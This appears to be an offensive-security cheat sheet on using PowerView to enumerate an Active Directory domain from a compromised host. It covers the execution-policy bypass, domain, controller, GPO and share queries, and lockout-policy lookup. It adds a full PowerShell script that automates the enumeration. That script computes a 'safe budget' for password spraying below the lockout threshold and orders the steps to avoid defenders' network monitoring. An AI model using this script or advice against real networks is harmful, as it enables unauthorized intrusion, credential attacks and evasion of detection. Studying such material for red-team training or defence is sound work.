PowerView

First get PowerView.ps1 onto the host you compromised (how you transfer it is up to you). Keep in mind that the stock script is heavily signatured: Defender and most AV products flag the unmodified PowerView.ps1 as soon as it touches disk or gets loaded, so expect to deal with that before any of the commands below will run.

Next, launch PowerShell with the execution policy bypassed. The execution policy only restricts which scripts PowerShell is willing to run; it is not a security boundary and does nothing against AV or AMSI:

powershell -ep bypass

-ep is the short form of -ExecutionPolicy, and the bypass only applies to the new process you just started.

Then load PowerView by dot-sourcing it. The leading dot followed by a space matters: it runs the script in the current scope so its functions stay available in your session, whereas running .\PowerView.ps1 on its own executes it in a child scope and the functions disappear as soon as it finishes:

. .\PowerView.ps1

PowerView can retrieve a lot of information. For example, get information about the current domain with:

Get-NetDomain

or list the domain controllers with:

Get-NetDomainController

These are the original PowerView function names. The current dev branch of PowerView renamed most of them (Get-Domain, Get-DomainController, and so on) but keeps the old names as aliases, so either set works depending on the copy you loaded.

To check a particular section of the domain policy, for example "System Access" (the password and lockout settings, which is what you want before any password spraying), index into the object returned by Get-DomainPolicy:

(Get-DomainPolicy)."system access"

The property name mirrors the section header in the Default Domain Policy's GptTmpl.inf; property lookups are case-insensitive, so "system access" works. If this comes back empty on a newer copy of PowerView, list the returned object's properties (Get-Member is enough), as newer builds expose the section under a slightly different name.

Look for shares. Unlike the LDAP queries above, this one opens an SMB connection to every host in the domain, so it is the noisy step:

Invoke-ShareFinder

(In the dev branch this is Find-DomainShare; Invoke-ShareFinder remains as an alias.)

List the GPOs in the domain (the returned objects include the gpcfilesyspath on SYSVOL, which is where the policy files live):

Get-NetGPO

(Get-DomainGPO in the dev branch.)
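The whole procedure above, as one script rather than commands typed one at a time. This is an added example and is not part of the original notes or of PowerView itself. It resolves whichever function names the loaded copy of PowerView defines (the original names used above or the dev-branch ones), saves each result to a file, and turns the "System Access" lockout settings into a password-spraying budget. Assumptions: PowerView.ps1 sits in the current directory, the helper name Resolve-PVCommand and the output folder name are this example's own choices, and the fallback to a SystemAccess property is there for newer builds that name the section without the space.

```powershell
# Added example, not the page's or PowerView's own code.
# Assumes PowerView.ps1 is in the current directory.

# Same effect as starting with "powershell -ep bypass", limited to this process.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force

# Dot-source: the leading ". " keeps PowerView's functions in this session.
. .\PowerView.ps1

# Return the first candidate function name that the loaded PowerView defines
# (helper name is this example's own).
function Resolve-PVCommand {
    param([Parameter(Mandatory)][string[]]$Candidates)
    foreach ($name in $Candidates) {
        if (Get-Command -Name $name -ErrorAction SilentlyContinue) { return $name }
    }
    throw "PowerView does not appear to be loaded (none of: $($Candidates -join ', '))"
}

# Dev-branch name first, original name second.
$domainCmd = Resolve-PVCommand 'Get-Domain', 'Get-NetDomain'
$dcCmd     = Resolve-PVCommand 'Get-DomainController', 'Get-NetDomainController'
$policyCmd = Resolve-PVCommand 'Get-DomainPolicyData', 'Get-DomainPolicy'
$gpoCmd    = Resolve-PVCommand 'Get-DomainGPO', 'Get-NetGPO'
$shareCmd  = Resolve-PVCommand 'Find-DomainShare', 'Invoke-ShareFinder'

# Output folder name is arbitrary.
$outDir = Join-Path $PWD ('pv-enum-' + (Get-Date -Format 'yyyyMMdd-HHmmss'))
New-Item -ItemType Directory -Path $outDir | Out-Null

# Quiet LDAP queries first.
& $domainCmd | Format-List | Out-File (Join-Path $outDir 'domain.txt')
& $dcCmd     | Format-List | Out-File (Join-Path $outDir 'domain-controllers.txt')
& $gpoCmd    | Select-Object displayname, name, gpcfilesyspath |
    Out-File (Join-Path $outDir 'gpos.txt')

# Domain policy: the "System Access" section of the Default Domain Policy's
# GptTmpl.inf holds the password and lockout settings. The original PowerView
# keeps the INF section header as the key; the SystemAccess fallback is an
# assumption for newer builds that drop the space.
$policy = & $policyCmd
$systemAccess = $policy.'System Access'
if (-not $systemAccess) { $systemAccess = $policy.SystemAccess }
$systemAccess | Out-File (Join-Path $outDir 'system-access.txt')

# Turn the lockout settings into a spray budget before touching any account.
# LockoutBadCount 0 means lockout is disabled; otherwise stay one attempt below
# the threshold per ResetLockoutCount window. INF values come back as strings,
# and ResetLockoutCount is absent when lockout is off, hence the [int] casts.
$badCount = [int]$systemAccess.LockoutBadCount
$window   = [int]$systemAccess.ResetLockoutCount
$minLen   = [int]$systemAccess.MinimumPasswordLength
if ($badCount -eq 0) {
    "No account lockout policy; minimum password length $minLen"
} else {
    "Lockout after $badCount bad attempts, counter resets after $window min; " +
    "safe budget: $($badCount - 1) attempts per account per window; min length $minLen"
}

# Share hunting last: it opens an SMB session to every host and is the noisy step.
# -CheckShareAccess keeps only the shares the current user can actually read.
& $shareCmd -CheckShareAccess | Out-File (Join-Path $outDir 'shares.txt')

"Results written to $outDir"
```

Run it from the PowerShell session you launched with powershell -ep bypass (the Set-ExecutionPolicy line is then redundant but harmless). The ordering is deliberate: everything up to the share hunt is LDAP traffic to a domain controller, which blends in with normal activity, while the share hunt touches every machine and is what a defender's network monitoring is most likely to notice, so it is done last and only after the quieter results are already saved.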

A cheat sheet is available here:
